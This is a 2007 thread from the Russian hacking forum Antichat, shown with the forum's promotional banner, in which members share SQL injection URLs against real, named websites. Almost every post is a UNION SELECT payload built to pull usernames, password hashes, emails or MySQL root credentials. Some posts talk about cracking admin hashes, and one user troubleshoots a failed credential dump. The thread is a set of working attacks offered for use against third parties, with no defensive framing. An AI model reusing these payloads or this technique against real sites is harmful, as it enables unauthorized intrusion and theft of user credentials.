Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

04.03.2007, 16:41
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме: 3536885
Репутация:
447
|
|
2n1†R0x
http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,concat(username,char(58),user_p assword,char(58),user_email,char(58),user_icq),4,5 ,6,7,8,9,10,11,12,13,14,15+from+phpbb_users/* ну вот например таблица юзеров, можно админский хеш попробовать раcшивровать.
http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+membe rs+limit+0,1/* и перебираем,пасс в чистом виде 
Последний раз редактировалось }{0TT@БЬ)Ч; 04.03.2007 в 17:03..
|
|
|

04.03.2007, 18:11
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме: 631013
Репутация:
453
|
|
http://www.ebrain.org.zm/content.php?id=-9%20union%20select%201,id,concat(username,char(58) ,password),4%20from%20users/*
http://www.azs.agh.edu.pl/news.php?id=-225%20UNION%20SELECT%200,1,2,3,4,5,6,7,concat(name ,char(58),password),9,10,11,12%20from%20users/*
http://80.241.173.147/icimus/news.php?id=15%20union%20select%201,2,3,4/*
http://centerstageproject.com/news.php?id=129%20UNION%20SELECT%200,1,2,3,4,5,6%2 0from%20information_schema.tables/*
)))
|
|
|

04.03.2007, 18:31
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
__http://www.herb4all.ru/index.php?group=1000+union+select+1,version(),3/*
__http://www.mp2.ru/?p_id=-1+union+select+1,version(),concat(database(),char( 58),user())/*
__http://www.japanfish.ru/index.php?razdel=-1+union+select+1,2,3/*
|
|
|

04.03.2007, 19:01
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
http://www.superherohype.com/news/topnews.php?id=-1+union+select+1
Yahoo.Com
http://widgets.yahoo.com/gallery/view.php?widget=41405'
http://widgets.yahoo.com/gallery/view.php?widget=41405+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15/*
|
|
|

04.03.2007, 22:40
|
|
Новичок
Регистрация: 01.03.2007
Сообщений: 2
Провел на форуме: 3478
Репутация:
0
|
|
_http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
Надеюсь у кого нибудь получиться доломать до пасса админа =)
|
|
|

04.03.2007, 22:44
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме: 1583810
Репутация:
56
|
|
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*
user:root а дальше пасса чето не могу найти)))
|
|
|

04.03.2007, 22:52
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме: 2132613
Репутация:
1365
|
|
http://www.corp-gov.ru/bd/index.php3?base_id=-1+union+select+1,version(),3,4,5/*
|
|
|

05.03.2007, 00:07
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме: 631013
Репутация:
453
|
|
http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
Надеюсь у кого нибудь получиться доломать до пасса админа =)
Я не знаю, как можно достучаться до пасса админа, не имея скуля. Сайт выдает ошибку при любом значении id..
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*
Мдя, ничего не понимаю. При запросе
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+111,2,3,4,5,6,7,8+from+mysql.user
Сайт выдает принтабельной колонку 1. (html код =>
printer_friendly_without.php?id=111)
При запросе
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user
Проявляется printer_friendly_without.php?id=root
Но при запросах
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+user,2,3,4,5,6,7,8+from+mysql.user
и
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+password,2,3,4,5,6,7,8+from+mysql.user
printer_friendly_without.php?id= остается пустым
Последний раз редактировалось kamaz; 05.03.2007 в 00:21..
|
|
|

05.03.2007, 00:11
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме: 4908597
Репутация:
1866
|
|
Сообщение от kamaz
Я малость не понимаю, где ты взял инфу user:root. Колонка 1 вроде не принтабельна. А при запросах в колонку 2 сайт выдает ошибку.
aes...
|
|
|

05.03.2007, 01:38
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
http://www.x2studios.com/index.php?page=papers&id=-8+union+select+1,2,3,concat(user,char(58),password ),5,6,7,8+from+mysql.user
делать нехер =\
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|